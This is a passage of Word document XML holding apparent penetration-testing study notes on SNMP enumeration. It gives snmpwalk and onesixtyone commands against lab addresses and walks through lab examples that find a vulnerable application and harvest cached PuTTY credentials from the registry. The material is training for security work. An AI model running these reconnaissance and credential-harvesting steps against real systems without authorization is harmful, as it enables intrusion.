        </w:rPr>
        <w:t xml:space="preserve">It's numeric OID is: 1.3.6.1.4.1.8072.1.3.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 192.168.236.145 1.3.6.1.2.1.25.6.3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003140">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerating installed services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003141">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX A .145</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003142">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We found PuTTY, so we looked at the PuTTY registry to try and find cached credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could have also seen it in winPEAS output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003144">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003145">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003146">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 -t 10 192.168.50.151</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate ENTIRE MIB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003148">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try adding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Oa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to the command.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This parameter will automatically translate any hexadecimal string into ASCII that was otherwise not decoded.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="531"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 6.4.6. SNMP Enumeration Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 10 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">option to increase the timeout period to 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 6.4.6. SNMP Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate running processes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It might</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveal vulnerable applications or even indicate which kind of anti-virus is running on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 6.4.6. SNMP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003150">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003151">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate open TCP ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003153">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It can disclose ports that are listening only locally and thus reveal a new service that had been previously unknown</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003154">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 6.4.6. SNMP Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003155">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003156">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003157">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003158">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003159">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_30lo8vcuieqx" w:id="437"/>
      <w:bookmarkEnd w:id="437"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example from XXXXXXXXX-A regarding installed applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In XXXXXXXXX-A .145, we first used snmp walk to look at installed applications and found wifi mouse 1.7.8.5 which is vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 192.168.236.145 1.3.6.1.2.1.25.6.3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="210"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you should see</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iso.3.6.1.2.1.25.6.3.1.2.12 = STRING: "Mouse Server version 1.7.8.5"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003160">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And for priv esc, we had to use snmpwalk again. This time, we used the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">same command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and found PuTTY, which caused us to look at PuTTY cached credentials in registry, which gave us credentials!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003161">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003162">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_erb1uyaauzc" w:id="438"/>
      <w:bookmarkEnd w:id="438"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example from XXXXXXXXX-B regarding looking at interesting non-default MIB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003163">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003164">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX-B .151</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003165">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003166">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First, thanks to AutoRecon, we saw that SNMP UDP was open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003167">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Tried looking at the website but it was default Ubuntu site with no directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003168">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And so the only things left were SNMP and FTP. FTP has no anonymous login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, due to AutoRecon running onesixtyone, I saw only </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">public community string was op</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">en</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="65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onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt -dd 192.168.216.149 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316B">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So, I started to enumerate SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000316C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="655"/>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905000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="574" name="image564.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image564.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109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316D">
      <w:pPr>
        <w:numPr>
